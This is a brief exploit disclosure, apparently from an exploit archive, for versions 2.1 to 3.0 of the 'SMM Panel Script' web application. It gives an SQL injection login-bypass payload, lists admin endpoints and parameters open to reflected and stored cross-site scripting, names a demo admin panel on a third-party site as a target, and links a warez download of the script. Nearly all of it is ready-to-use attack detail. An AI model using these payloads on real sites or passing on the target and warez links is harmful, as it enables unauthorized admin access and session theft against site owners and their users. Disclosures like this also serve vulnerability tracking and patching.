/****************************************************************
**
** Exploit Title : SMM Panel Script v2.1 <= 3.0 MUltiple Vulnerabilities
**
** Author : z3r0fy
**
** Venedor Homepage : https://www.web-ofisi.com/
**
** Download (Warez) : https://www.warezm.com/php-scriptleri/ucretsiz-smm-panel-indir-2018-efsane/
**
** Tested On : Parrot Security OS
**
** Demo : http://scalaajans.net/admin/
**
** https://youtu.be/jpzwQwX5bqg
**
\*******************************************************************
WLB 1 :
AUnthentication Bypass Via Sql
PoC : '=''or'
---------------------------------------------
WLB 2 :
Reflected Cross Site Scripting
/admin/a-urungaleri-ekle.php?urun_id=[xss pay]
/admin/a-urungaleri-ekle.php?urun_ad=[XSS PAY]
/admin/a-urungaleri-listele.php?urun_id=[xss pay]
/admin/a-urungaleri-listele.php?urun_ad=[XSS PAY]
/admin/a-uruntanitimgaleri-ekle.php?uruntanitim_id=[XSS PAY]
---------------------------------
WLB 3 :
Stored Cross Site Scripting
/admin/a-api-ayar.php
--------------------------------------------
Twitter.com/z3r0fy
t.me/z3r0fy
------------------------------------------------